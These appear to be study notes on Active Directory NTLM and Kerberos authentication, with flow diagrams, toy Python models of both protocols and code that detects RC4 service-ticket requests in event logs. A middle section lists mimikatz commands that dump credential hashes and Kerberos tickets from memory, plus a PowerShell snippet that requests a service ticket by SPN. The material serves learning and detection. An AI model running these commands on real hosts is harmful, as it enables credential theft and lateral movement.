AD - authentication

NTLM

Client                              Application                                    Domain Controller
                                      Server                                             (DC)
  |                                      |                                                 |
  | [Step 1]                             |                                                 |
  | Calculate NTLM hash                  |                                                 |
  | (from user password)                 |                                                 |
  |                                      |                                                 |
  | [Step 2] -------------------------->  |                                                 |
  | NTLM NEGOTIATION                     |                                                 |
  | (send username to app server)        |                                                 |
  |                                      |                                                 |
  | <-------------------------- [Step 3] |                                                 |
  | NTLM CHALLENGE                       |                                                 |
  | (app server returns random nonce)    |                                                 |
  |                                      |                                                 |
  | [Step 4] -------------------------->  |                                                 |
  | NTLM Authenticate Message            |                                                 |
  | (encrypt nonce with NTLM hash)       |                                                 |
  | (send encrypted nonce to app server) |                                                 |
  |                                      | [Step 5] -------------------------------------> |
  |                                      | NetLogon Network Info                           |
  |                                      | (send encrypted nonce, username, nonce to DC)   |
  |                                      |                                                 |
  |                                      | <------------------------------------- [Step 6] |
  |                                      | (Approve/Reject)                                |
  |                                      |                                                 |
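
The exchange above, worked through in code as an added example (not part of the original notes). It uses the NTLMv2 form of steps 3 to 6 from MS-NLMP, where "encrypt the nonce with the NTLM hash" is an HMAC-MD5 keyed by a hash derived from the NT hash: the client sends a proof over the server's nonce, and the DC validates it using nothing but the stored NT hash. User, domain, server name and the 16-byte NT hash value are constructed; the NT hash is taken as input because MD4 is disabled in many OpenSSL 3 builds of hashlib.

```python
import hashlib
import hmac
import os
import struct
import time

# Example code added for this page, not part of the original notes. Constructed
# identities and a constructed 16-byte value standing in for the NT hash
# (MD4 of the UTF-16LE password); the computation below does not depend on how
# the hash was produced.
USER, DOMAIN = "alice", "CORP"
NT_HASH = bytes.fromhex("0123456789abcdef0123456789abcdef")


def av_pair(av_id: int, value: str) -> bytes:
    """One AV_PAIR from the server's TargetInfo: id, byte length, UTF-16LE value."""
    data = value.encode("utf-16-le")
    return struct.pack("<HH", av_id, len(data)) + data


# TargetInfo the application server puts in its CHALLENGE message (constructed):
# MsvAvNbDomainName (2), MsvAvNbComputerName (1), MsvAvEOL (0).
TARGET_INFO = av_pair(2, DOMAIN) + av_pair(1, "APPSRV01") + struct.pack("<HH", 0, 0)


def filetime_now() -> int:
    """Windows FILETIME: 100 ns ticks since 1601-01-01."""
    return (int(time.time()) + 11644473600) * 10_000_000


def ntowf_v2(nt_hash: bytes, user: str, domain: str) -> bytes:
    """NTOWFv2: HMAC-MD5 keyed with the NT hash over UPPER(user) || domain in UTF-16LE."""
    return hmac.new(nt_hash, (user.upper() + domain).encode("utf-16-le"), hashlib.md5).digest()


def build_blob(timestamp: int, client_nonce: bytes, target_info: bytes) -> bytes:
    """NTLMv2_CLIENT_CHALLENGE ('temp' in the spec): version, time, client nonce, TargetInfo."""
    return (b"\x01\x01" + b"\x00" * 6 + struct.pack("<Q", timestamp)
            + client_nonce + b"\x00" * 4 + target_info + b"\x00" * 4)


def client_authenticate(nt_hash: bytes, user: str, domain: str, server_nonce: bytes, blob: bytes) -> bytes:
    """Step 4: NtChallengeResponse = NtProofStr || blob; NtProofStr binds the server nonce."""
    nt_proof = hmac.new(ntowf_v2(nt_hash, user, domain), server_nonce + blob, hashlib.md5).digest()
    return nt_proof + blob


def dc_validate(stored_nt_hash: bytes, user: str, domain: str, server_nonce: bytes,
                nt_challenge_response: bytes) -> bool:
    """Steps 5-6: from username, nonce and response (NetLogon), recompute NtProofStr with the stored hash."""
    nt_proof, blob = nt_challenge_response[:16], nt_challenge_response[16:]
    expected = hmac.new(ntowf_v2(stored_nt_hash, user, domain), server_nonce + blob, hashlib.md5).digest()
    return hmac.compare_digest(expected, nt_proof)


def run_exchange(client_nt_hash: bytes, stored_nt_hash: bytes, server_nonce=None):
    """Drive one full exchange; returns (accepted, response, server_nonce)."""
    if server_nonce is None:
        server_nonce = os.urandom(8)                      # Step 3: the server's random challenge
    blob = build_blob(filetime_now(), os.urandom(8), TARGET_INFO)
    response = client_authenticate(client_nt_hash, USER, DOMAIN, server_nonce, blob)
    return dc_validate(stored_nt_hash, USER, DOMAIN, server_nonce, response), response, server_nonce


if __name__ == "__main__":
    ok, resp, nonce = run_exchange(NT_HASH, NT_HASH)
    print("valid hash accepted:", ok)
    print("wrong hash accepted:", run_exchange(NT_HASH, bytes(16))[0])
    print("old response replayed against a new nonce accepted:",
          dc_validate(NT_HASH, USER, DOMAIN, bytes(8), resp))
```

Two things the code makes visible: the DC validates with the stored NT hash alone, so that hash is a password-equivalent credential and must be protected like one; and the server nonce defeats replay of a captured response, but nothing in the response ties it to the server the client believed it was talking to unless signing or channel binding (EPA) is enforced.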

Kerberos

Client                           Domain Controller   Application Server
                                       (DC)          (Resource Server)
  |                                      |                   |
  | ---------------------------------->  |                   |
  | Authentication Server Request        |                   |
  |                                      |                   |
  | <----------------------------------- |                   |
  | Authentication Server Reply          |                   |
  |                                      |                   |
  | ---------------------------------->  |                   |
  | Ticket Granting Service Request      |                   |
  |                                      |                   |
  | <----------------------------------- |                   |
  | Ticket Granting Service Reply        |                   |
  |                                      |                   |
  | ------------------------------------------------------>  |
  | Application Request                                      |
  |                                                          |
  | <------------------------------------------------------  |
  | Application Response                                     |
  |                                                          |
  • Authentication Server Request
    • Preparation
      • Client creates the user hash from the username and password
      • Client encrypts a timestamp with the user hash
    • Payload: encrypted timestamp
  • Authentication Server Reply
    • Preparation
      • DC creates the same user hash from the username and password
      • DC decrypts the timestamp
    • Payload: session key (encrypted with the user hash) + TGT
  • Ticket Granting Service Request
    • ...
  • Ticket Granting Service Reply
    • Payload:
      • SPN
      • Session key
      • Service ticket
  • Application Request / Response
    • Resource server accepts or rejects the request
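
The Authentication Server Request / Reply step above, modelled as an added example (not part of the original notes): the client proves knowledge of its long-term key by encrypting a timestamp, the KDC on the DC decrypts and checks it, and the reply carries the session key under the user key plus a TGT under the krbtgt key. The string-to-key step copies the shape of the Kerberos AES etypes (PBKDF2, salt = realm + principal, 4096 iterations) but leaves out the final DK() step, and `toy_encrypt` is an HMAC-SHA256 stream cipher with a tag standing in for AES-CTS with its integrity check, so none of the bytes are wire-compatible. Realm, principal and password are constructed; the error names are the RFC 4120 codes the KDC would return in each case.

```python
import hashlib
import hmac
import os
import struct
import time
from typing import Optional

# Example code added for this page, not part of the original notes.
# Constructed realm, principal and password; toy cipher, not a Kerberos etype.
REALM, PRINCIPAL, PASSWORD = "CORP.COM", "alice", "constructed-password"
CLOCK_SKEW = 300   # seconds; the Kerberos default maximum clock skew


def string_to_key(password: str, realm: str, principal: str) -> bytes:
    """Long-term key derived from the password. The DC stores this key, not the password."""
    salt = (realm + principal).encode()
    return hashlib.pbkdf2_hmac("sha1", password.encode(), salt, 4096, 32)


def _keystream(key: bytes, nonce: bytes, length: int) -> bytes:
    """Counter-mode keystream from HMAC-SHA256 (toy construction)."""
    out, counter = b"", 0
    while len(out) < length:
        out += hmac.new(key, nonce + struct.pack(">I", counter), hashlib.sha256).digest()
        counter += 1
    return out[:length]


def toy_encrypt(key: bytes, plaintext: bytes) -> bytes:
    """nonce || ciphertext || tag; the tag plays the role of the etype's integrity check."""
    nonce = os.urandom(16)
    ct = bytes(p ^ s for p, s in zip(plaintext, _keystream(key, nonce, len(plaintext))))
    tag = hmac.new(key, nonce + ct, hashlib.sha256).digest()
    return nonce + ct + tag


def toy_decrypt(key: bytes, blob: bytes) -> bytes:
    """Raises ValueError when the key is wrong or the blob was altered."""
    nonce, ct, tag = blob[:16], blob[16:-32], blob[-32:]
    if not hmac.compare_digest(hmac.new(key, nonce + ct, hashlib.sha256).digest(), tag):
        raise ValueError("integrity check failed")
    return bytes(c ^ s for c, s in zip(ct, _keystream(key, nonce, len(ct))))


def client_as_req(password: str, now: Optional[int] = None) -> dict:
    """AS-REQ with PA-ENC-TIMESTAMP: the current time encrypted under the user's key."""
    ts = int(time.time()) if now is None else now
    key = string_to_key(password, REALM, PRINCIPAL)
    return {"cname": PRINCIPAL, "realm": REALM,
            "pa_enc_timestamp": toy_encrypt(key, struct.pack(">Q", ts))}


class Kdc:
    """The KDC role of the DC: account keys, the krbtgt key and a pre-auth replay cache."""

    def __init__(self):
        self.keys = {PRINCIPAL: string_to_key(PASSWORD, REALM, PRINCIPAL),
                     "krbtgt": os.urandom(32)}
        self.seen = set()   # (cname, timestamp) pairs already accepted

    def handle_as_req(self, req: dict, now: Optional[int] = None):
        now = int(time.time()) if now is None else now
        key = self.keys.get(req["cname"])
        if key is None:
            return "KDC_ERR_C_PRINCIPAL_UNKNOWN", None
        try:   # wrong password -> wrong key -> tag mismatch; Windows logs this as event 4771
            ts = struct.unpack(">Q", toy_decrypt(key, req["pa_enc_timestamp"]))[0]
        except ValueError:
            return "KDC_ERR_PREAUTH_FAILED", None
        if abs(now - ts) > CLOCK_SKEW:          # stale or future timestamp
            return "KRB_AP_ERR_SKEW", None
        if (req["cname"], ts) in self.seen:     # same encrypted timestamp presented twice
            return "KRB_AP_ERR_REPEAT", None
        self.seen.add((req["cname"], ts))
        session_key = os.urandom(16)
        as_rep = {
            "enc_part": toy_encrypt(key, session_key),                                           # for the user
            "tgt": toy_encrypt(self.keys["krbtgt"], session_key + req["cname"].encode()),       # for the KDC only
        }
        return "OK", as_rep


def client_process_as_rep(password: str, as_rep: dict) -> bytes:
    """The client recovers the session key from enc_part; it cannot open the TGT."""
    key = string_to_key(password, REALM, PRINCIPAL)
    return toy_decrypt(key, as_rep["enc_part"])


if __name__ == "__main__":
    kdc = Kdc()
    status, rep = kdc.handle_as_req(client_as_req(PASSWORD))
    print(status, "session key:", client_process_as_rep(PASSWORD, rep).hex())
    print(kdc.handle_as_req(client_as_req("wrong-password"))[0])
```

The three failure branches are the ones a DC actually distinguishes: a bad key (event 4771, the noisy signal behind password spraying), a clock more than five minutes off, and a repeated pre-authenticator, which a replay cache catches even though the timestamp is still within skew.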

Dump hashes

> mimikatz.exe
mimikatz> privilege::debug
mimikatz> sekurlsa::logonpasswords

Dump tickets

> mimikatz.exe
mimikatz> privilege::debug
mimikatz> sekurlsa::tickets

Request a service ticket by SPN

# Load the .NET assembly that exposes the Kerberos requestor token class
Add-Type -AssemblyName System.IdentityModel
# Ask the KDC for a service ticket (TGS-REQ) for the given SPN; the DC records this as event 4769
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList 'HTTP/CorpWebServer.corp.com'
# List the tickets now cached for the current logon session
klist
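
What the DC side of all three flows on this page looks like in the Security log, as an added example (not part of the original notes): 4776 is the NTLM validation of steps 5-6, 4768 the AS-REQ that issues the TGT, and 4769 the TGS-REQ that the `KerberosRequestorSecurityToken` call above triggers. The field names are the real event fields; the accounts, hosts, addresses and the compact `id|key=value|...` line format are constructed stand-ins for the event XML.

```python
from collections import defaultdict

# Example code added for this page, not part of the original notes.
# Constructed event lines; real field names, made-up values.
SAMPLE_EVENTS = """\
4776|PackageName=MICROSOFT_AUTHENTICATION_PACKAGE_V1_0|TargetUserName=alice|Workstation=WS01|Status=0x0
4768|TargetUserName=alice|ServiceName=krbtgt|TicketEncryptionType=0x12|PreAuthType=2|IpAddress=10.0.0.5|Status=0x0
4769|TargetUserName=alice@CORP.COM|ServiceName=WS02$|TicketEncryptionType=0x12|IpAddress=10.0.0.5|Status=0x0
4769|TargetUserName=alice@CORP.COM|ServiceName=svc_web|TicketEncryptionType=0x17|IpAddress=10.0.0.5|Status=0x0
4769|TargetUserName=alice@CORP.COM|ServiceName=svc_sql|TicketEncryptionType=0x17|IpAddress=10.0.0.5|Status=0x0
4769|TargetUserName=bob@CORP.COM|ServiceName=svc_old|TicketEncryptionType=0x17|IpAddress=10.0.0.9|Status=0x0
"""

# Ticket etype values as logged by Windows: 0x17 = RC4-HMAC, 0x11 = AES128, 0x12 = AES256
RC4_HMAC = 0x17

PROTOCOL_BY_EVENT = {
    4776: "NTLM (DC validation, steps 5-6)",
    4768: "Kerberos AS-REQ (TGT issued)",
    4769: "Kerberos TGS-REQ (service ticket issued)",
}


def parse_events(text: str) -> list:
    """Turn the constructed 'id|key=value|...' lines into dicts with an int EventID."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        event_id, *fields = line.split("|")
        ev = {"EventID": int(event_id)}
        for field in fields:
            key, _, value = field.partition("=")
            ev[key] = value
        events.append(ev)
    return events


def auth_protocol(ev: dict) -> str:
    """Which of the two flows on this page an event belongs to."""
    return PROTOCOL_BY_EVENT.get(ev["EventID"], "other")


def rc4_service_tickets(events: list) -> list:
    """Successful 4769s for user-account SPNs issued with RC4: (requester, service, source IP).

    Machine accounts (name ends in '$') and the krbtgt ticket are excluded; an RC4 ticket
    for a user account with AES keys available is an encryption downgrade worth reviewing.
    """
    found = []
    for ev in events:
        if ev["EventID"] != 4769 or ev.get("Status") != "0x0":
            continue
        if int(ev["TicketEncryptionType"], 16) != RC4_HMAC:
            continue
        service = ev["ServiceName"]
        if service.endswith("$") or service == "krbtgt":
            continue
        found.append((ev["TargetUserName"], service, ev["IpAddress"]))
    return found


def rc4_requesters(events: list, threshold: int = 2) -> dict:
    """Requesters (user, IP) that pulled RC4 service tickets for at least `threshold` distinct services."""
    per_client = defaultdict(set)
    for user, service, ip in rc4_service_tickets(events):
        per_client[(user, ip)].add(service)
    return {client: sorted(services) for client, services in per_client.items()
            if len(services) >= threshold}


if __name__ == "__main__":
    evs = parse_events(SAMPLE_EVENTS)
    for ev in evs:
        print(ev["EventID"], auth_protocol(ev), ev["TargetUserName"])
    print("RC4 service tickets:", rc4_service_tickets(evs))
    print("requesters over threshold:", rc4_requesters(evs))
```

Baseline before alerting: an account whose `msDS-SupportedEncryptionTypes` only allows RC4 will produce 0x17 tickets legitimately, so the useful signal is RC4 for accounts that do have AES keys, and in particular one requester collecting RC4 tickets for many distinct service accounts in a short window, which is what `rc4_requesters` isolates.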